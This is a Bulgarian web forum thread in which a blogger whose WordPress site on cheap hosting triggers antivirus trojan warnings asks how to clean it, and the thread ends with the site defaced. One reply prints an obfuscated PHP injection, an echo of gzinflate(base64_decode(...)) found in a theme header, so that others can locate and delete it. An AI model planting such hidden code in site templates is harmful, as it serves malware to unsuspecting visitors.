Проблем с влизането в блога ми

eshk0

Member
Ползвах един хост от някакъв джигитаец, и преди около месец изчезна някаде и блога ми беше офлайн 20-30 дни, преди няколко дена гледам хоста е тръгнал но сега като се опитвам да влизам в него, антивирусната ме спира.

Ето и какво ми изкарва:

Infection Details
URL: http://-----
Process: C:\Program Files\Mozilla Firefox\firefox...
Infection: JS:ScriptPE-inf [Trj]


6373ac5309.jpg


помислих,че е от рекламите, махнах всички кодове но пак не се оправи, а при някои хора го отваря без проблем :shock:
 
От: Проблем с влизането в блога ми

Ползвах един хост от някакъв джигитаец...

Е, така е, като се скатавате и гледате да минете метър, да плащате колкото се може по-евтино а хич не си задавате въпроса за сигурността на системата!
 
От: Проблем с влизането в блога ми

добре де, за какво да дам в Icn.bg на месец по 50 лв за VPS, след като има такива за по 7-8 лв на месец + нямам никакъв приход от този блог! Също така имам приятели който от години насам са на този хост и са доволни.
 
От: Проблем с влизането в блога ми

За какво ти е впс за 1 блог?
 
От: Проблем с влизането в блога ми

в началото този блог беше в icn и до 1 месец имаше над 1к уникални на ден, след което почнаха да ми пращат имейли за да си купя VPS, защото натоварвал хоста много повече от допустимото...
и сега как мога да оправя това чудо дето ми излиза на антивирусната? Trojan (имам достъп до файловете през фтп)
 
От: Проблем с влизането в блога ми

Като не искаш да плащаш за хост си правиш блога в блогспот и си свиркаш. Не мога да разбера защо всеки се бута да е на платен хостинг, дори когато платения хостинг е на светлинни години като качество и сигурност от безплатния.
 
От: Проблем с влизането в блога ми

не съм погледнал там, но как да хоствам блог за filesharing в блогспот?
 
От: Проблем с влизането в блога ми

никой ли не знае как мога да отстраня това л*йно?
 
От: Проблем с влизането в блога ми

никой ли не знае как мога да отстраня това л*йно?
И аз скоро страдах от това. Само аваста ми изкарваше тоя прозорец - махни го и спокойно ще си влезеш в блога. После влез и си огледай кода особено в хедъра и футъра, ето, чети в тази тема - http://www.predpriemach.com/showthread.php?t=34776 и виж тоя код или нещо подобно къде ще го намериш -

<?php
#c3284d#
echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS1 49puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7tx n7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7 XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2c wgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYT QSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQ afMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
#/c3284d#
wp_head(); ?>

Като го намериш, трий и си готов.
 
От: Проблем с влизането в блога ми

не намирам подобен код в хедър и футър файловете :S
 
От: Проблем с влизането в блога ми

тц тц тц
аз бих изтрил всичко - после качвам само старите постове и коментари ако има
добавям същите плъгини
и готово

сега ти чакаш някои да ти каже точка по точка какво да направи - няма да стане :wink:
 
От: Проблем с влизането в блога ми

За съжаление, всеки път е различно и няма как да има точна рецепта, иска ровене във всички файлове, търсене. Сега всички, които имат аваст на компютрите си няма да могат да влизат в сайта, докато не го изчистиш.
 
От: Проблем с влизането в блога ми

смених темата, сега пък няма проблем, значи махам старата тема и готово :D
 
От: Проблем с влизането в блога ми

само в тази тема дето съм сложил сега, има реклама в някой от файловете и се появява когато гледам някаква тема(публикация) а в самия индекс си излиза брояча който съм сложил :shock:
редактирах footer.php и уж махнах рекламата но е include от някъде :)
 
От: От: Проблем с влизането в блога ми

само в тази тема дето съм сложил сега, има реклама в някой от файловете и се появява когато гледам някаква тема(публикация) а в самия индекс си излиза брояча който съм сложил :shock:
редактирах footer.php и уж махнах рекламата но е include от някъде :)

дай линк към сайта
 
От: Проблем с влизането в блога ми

вече съм хакнат, пу мамичката им :mad:

HaCkEd By LaStLoRd

Special Thanks : by Newo
 

Горе